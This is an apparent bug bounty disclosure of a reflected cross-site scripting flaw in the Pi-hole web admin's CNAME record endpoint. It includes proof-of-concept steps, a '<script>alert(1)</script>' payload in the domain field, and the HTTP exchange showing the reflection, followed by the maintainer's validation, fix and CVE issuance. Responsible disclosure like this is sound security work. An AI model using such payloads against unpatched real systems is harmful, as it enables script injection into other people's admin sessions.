Cross-site Scripting (XSS) - Reflected in pi-hole/adminlte


Reported on

Sep 1st 2021

✍️ Description

Reflected XSS in POST /admin/scripts/pi-hole/php/customcname.php

🕵️‍♂️ Proof of Concept

  1. Login as admin, Go to Local DNS -> CNAME Records -> Add a new CNAME record
  2. Input <script>alert(1)</script> in domain field and anything in target domain.
  3. The Payload in post body domain is URL encoded, use a proxy like burp to manually replace with the decoded value.
POST /admin/scripts/pi-hole/php/customcname.php HTTP/2
Cookie: persistentlogin=***; persistentlogin=***; PHPSESSID=***
Content-Length: 109
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

HTTP/2 200 OK
Server: nginx/1.21.1
Date: Wed, 01 Sep 2021 10:36:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 78
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Pi-Hole: The Pi-hole Web interface is working!
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000

{"success":false,"message":"Domain '<script>alert(1)<\/script>' is not valid"}

💥 Impact

Reflected XSS on POST parameter "domain".

We have contacted a member of the pi-hole/adminlte team and are waiting to hear back a year ago
wtwver submitted a
a year ago
Adam Warner validated this vulnerability a year ago
wtwver has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adam Warner confirmed that a fix has been merged on f52671 a year ago
wtwver has been awarded the fix bounty
a year ago


@admin Could u assists in issuing a CVE? Thanks a lot

Jamie Slome
a year ago


We are able to issue a CVE here, we just need double confirmation from the maintainer that they are happy for this to go ahead.


Adam Warner
a year ago



Jamie Slome
a year ago


CVE published! 🎉

Adam Warner
a year ago


to join this conversation